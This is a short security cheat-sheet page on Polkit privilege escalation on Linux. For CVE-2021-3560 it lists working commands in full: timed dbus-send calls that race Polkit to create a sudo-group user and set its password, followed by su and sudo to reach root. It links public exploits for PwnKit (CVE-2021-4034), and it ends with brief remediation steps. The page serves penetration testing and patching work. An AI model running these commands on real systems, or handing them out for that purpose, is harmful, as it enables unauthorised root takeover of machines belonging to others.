PolKit Privilege Escalation
Last modified: 2023-07-24
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
CVE-2021-3560
1. Send a dbus message to create a new user
Create a new user by sending a dbus message.
# string:tester: The new user named "tester".
# string:"Tester Account": The description of the new user.
# int32:1: sudo group
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Then check the new user ID (uid).
id tester
uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
2. Generate a new password hash
# -6: SHA512
openssl passwd -6 password123
Copy the output hash.
3. Send a dbus message to set a new password
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
4. Switch the new user
su tester
Enter the password you created e.g. “password123”.
Now change to root .
sudo -s
# or
sudo su root
CVE-2021-4034 (PwnKit)
PwnKit is vulnerability of Polkit to local privilege escalation.
There are many exploits available. Below are examples:
- https://github.com/arthepsy/CVE-2021-4034
- https://github.com/ly4k/PwnKit
- https://github.com/berdav/CVE-2021-4034
- https://github.com/Almorabea/pkexec-exploit (this is written by Python)
Remediations
To avoid the vulnerability, unset setuid from the pkexec executable.
sudo chmod 0755 /usr/bin/pkexec
# or
sudo chmod 0755 `which pkexec`
Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.
sudo apt update && sudo apt upgrade